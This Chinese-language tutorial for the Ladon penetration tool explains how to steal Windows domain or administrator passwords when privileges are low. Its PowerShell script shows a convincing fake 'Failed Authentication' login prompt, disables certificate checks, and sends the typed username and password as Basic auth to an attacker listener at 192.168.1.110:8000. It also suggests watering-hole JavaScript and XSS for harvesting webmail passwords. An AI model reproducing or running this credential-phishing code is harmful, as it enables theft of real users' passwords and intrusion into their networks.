版本
>= Ladon 6.6.3
原理
使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。
应用场景
域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)
Ladon监听
该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html
Ladon Web 800
PowerShell
执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
Add-Type @'
using System;
public class Authorization
{
public static void submit(string usr,string pwd)
{
string url = "http://192.168.1.110:8000/";
System.Net.HttpWebRequest myReq = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url);
string username = usr;
string password = pwd;
string usernamePassword = username + ":" + password;
System.Net.CredentialCache mycache = new System.Net.CredentialCache();
mycache.Add(new Uri(url), "Basic", new System.Net.NetworkCredential(username, password));
myReq.Credentials = mycache;
myReq.Headers.Add("Authorization", "Basic " + Convert.ToBase64String(new System.Text.ASCIIEncoding().GetBytes(usernamePassword)));
System.Net.WebResponse wr = myReq.GetResponse();
}}
'@
[Authorization]::submit($cred.username, $cred.getnetworkcredential().password)
工具下载
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
